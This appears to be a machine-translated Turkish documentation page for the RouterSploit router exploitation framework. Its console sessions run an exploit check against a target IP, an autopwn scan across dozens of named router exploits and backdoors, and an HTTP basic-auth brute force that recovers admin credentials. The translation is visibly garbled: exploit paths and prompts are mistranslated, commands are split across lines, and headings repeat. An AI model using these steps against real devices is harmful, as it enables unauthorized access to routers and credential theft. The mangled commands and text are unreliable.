routersploit Paket Açıklaması-
RouterSploit Framework, gömülü aygıtlara ayrılmış açık kaynaklı bir sömürü çerçevesidir. Penetrasyon test işlemlerine yardımcı olan çeşitli modüller içerir:-
Routersploit paketinde bulunan araçlar-
routersploit - RouterSploit Framework-
RouterSploit Kullanım Örnekleri-
RouterSploit'in farklı yönlendirici modelleri için çeşitli yararları vardır ve bir istismar göndermeden önce uzak hedefin savunmasız olup olmadığını kontrol etme yeteneği vardır.-
Gizlilik bir gereklilik değilse, herhangi bir güvenlik açığının bulunup bulunamayacağını görmek için otomatik tarayıcı modülünü kullanmayı deneyebilirsiniz .-
[*]
Bütün bunlardan başarısız olursa, RouterSploit bir numarası vardır creds HTTP, SSH ve Telnet gibi çeşitli hizmetler, kaba kuvvet modüller.-
- exploits - tanımlanmış güvenlik açıklarından yararlanan modüller
- krediler - ağ hizmetlerine karşı kimlik bilgilerini test etmek için tasarlanmış modüller
- tarayıcılar - bir hedefin herhangi bir açıklığa karşı savunmasız olup olmadığını kontrol eden modüller
Routersploit paketinde bulunan araçlar-
routersploit - RouterSploit Framework-
Kod:
root @ kali: ~ # routersploit
______ _ _____ _ _ _
| ___ \ | | / ___ | | | (_) |
| | _ / / ___ _ _ | | _ ___ _ __ \ `-. _ __ | | ___ _ | | _
| // _ \ | | | | __ / _ \ '__ | `-. \ '_ \ | | / _ \ | | __ |
| | \ \ (_) | | _ | | || __ / | / \ __ / / | _) | | (_) | | | _
\ _ | \ _ \ ___ / \ __, _ | \ __ \ ___ | _ | \ ____ / | .__ / | _ | \ ___ / | _ | \ __ |
| |
Yönlendirici Sömürü Çerçeve | _ |
Dev Team: Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename: Kötü Kan
Sürüm: 2.0.0
Toplam modül sayısı: 40
rsf>
RouterSploit Kullanım Örnekleri-
RouterSploit'in farklı yönlendirici modelleri için çeşitli yararları vardır ve bir istismar göndermeden önce uzak hedefin savunmasız olup olmadığını kontrol etme yeteneği vardır.-
Kod:
rsf> exploits / multi / misfortune_cookie
rsf (Misfortune Cookie) kullan> seçenekleri göster
Hedef seçenekler:
Ad Geçerli ayarlar Açıklama
---- ---------------- ------- ----
port 80 Hedef port
hedefi Hedef adres örn. http://192.168.1.1
rsf (Talihsiz Kurabiye)> hedef belirle 192.168.0.2
[+] {'hedef': '192.168.0.2'}
rsf (Talihsiz Kurabiye)> kontrol
[-] Hedef savunmasız
rsf değil (Misfortune Cookie)>
Gizlilik bir gereklilik değilse, herhangi bir güvenlik açığının bulunup bulunamayacağını görmek için otomatik tarayıcı modülünü kullanmayı deneyebilirsiniz .-
Kod:
rsf> tarayıcıları kullan / autopwn
rsf (AutoPwn)> show options
Hedef seçenekler:
İsim Geçerli ayarlar Açıklama
---- ---------------- ---------- -
port 80 Hedef port
hedefi Hedef IP adresi, örn. 192.168.1.1
rsf (AutoPwn)> hedef belirle 192.168.0.2
[+] {'target': '192.168.0.2'}
rsf (AutoPwn)> çalıştır
[*] Çalışma modülü .. .
[-] patlatır / Fortinet / fortigate_os_backdoor açık değildir
[-] patlatır / Belkin / n150_path_traversal açık değildir
[-] patlatır / Belkin / g_n150_password_disclosure açık değildir
[-] patlatır / Belkin / n750_rce kırılgan değildir
[-] patlatır / Belkin / g_plus_info_disclosure açık değildir
[-] patlatır / asus / infosvr_backdoor_rce açık değildir
[-] patlatır / asus / rt_n16_password_disclosure açık değildir
[-] patlatır / 2wire / gateway_auth_bypass açık değildir
[-] patlatır / teknikolor / tc7200_password_disclosure kırılgan değildir
patlatır / çocuklar / multi_rce açık değildir [-]
[-] patlatır / çocuklar / n300_auth_bypass kırılgan değildir
patlatır / çocuklar / prosafe_rce açık değildir [-]
[-] patlatır / asmax / ar_1004g_password_disclosure açık değildir
[ -] exploits / asmax / ar_804_gu_rce savunmasız değildir
[-] exploits / linksys / wap54gv3_rce savunmasız değildir
[-] exploits / linksys / 1500_2500_rce savunmasız değildir
[-] exploits / multi / misfortune_cookie savunmasız değildir
[-] exploits / cisco / ucs_manager_rce savunmasız değildir
[-] exploits / dlink / dsl_2750b_info_disclosure savunmasız değildir
[-] exploits / dlink / dir_645_password_disclosure savunmasız değildir
[-] exploits / dlink / dir_300_600_615_info_disclosure savunmasız değildir
[-] exploits / dlink / dir_300_320_615_auth_bypass savunmasız değildir
[-] exploits / dlink / dwr_932_info_disclosure savunmasız değildir
[-] exploits / dlink / dns_320l_327l_rce savunmasız değildir
[-] exploits / dlink / dvg_n5402sp_path_traversal savunmasız değildir
[ -] exploits / dlink / dir_300_600_rce savunmasız değildir
[-] exploits / juniper / screenos_backdoor savunmasız değildir
[-] exploits / comtrend / ct_5361t_password_disclosure savunmasız değildir
[-] Cihaz herhangi bir saldırıya karşı savunmasız değildir!
rsf (Otomatik Çekme)>
Bütün bunlardan başarısız olursa, RouterSploit bir numarası vardır creds HTTP, SSH ve Telnet gibi çeşitli hizmetler, kaba kuvvet modüller.-
Kod:
rsf> kullan c
kredileri / http_basic_bruteforce rsf (HTTP Temel Bruteforce)> gösterme seçenekleri
Hedef seçenekler:
Ad Geçerli ayarlar Açıklama
---- ---------------- -------- ---
port 80 Hedef port
hedefi Hedef IP adresi veya hedefli dosya: port (dosya: //)
Modül seçenekleri:
İsim Geçerli ayarlar Açıklama
---- ---------------- -----------
yolu / URL Yolu
yönetici Adı adlarına veya kullanıcı adları (file: //) dosyasını
şifreleri dosya : ///usr/share/routersploit/routersploit/wordlists/passwords.txt Parola veya parolalı dosya (dosya: //)
thread 8 Konu sayısı
verbosity yes Ekran kimlik doğrulaması girişimi rsf (HTTP Temel Bruteforce)> hedef belirle 192.168.0.2
[+] {'hedef': '192.168.0.2'}
rsf (HTTP Temel Bruteforce)> set parola dosyası: /// usr / share / wordlists /nmap.lst
[+] {'şifreler': 'dosya: ///usr/share/wordlists/nmap.lst'}
rsf (HTTP Temel Bruteforce)> ayrıntı ayarlanamaz
[+] {'ayrıntı': 'hayır' }
rsf (HTTP Temel Bruteforce)> çalıştırın
[*] Çalışan modül ...
[*] Geçen süre: 1.97385120392 saniye
[+] Kimlik bilgileri bulundu!
Hedef Liman Giriş Şifresi
------ ---- ----- --------
192.168.0.2 80 yönetici şifresi
rsf (HTTP Temel Bruteforce)>

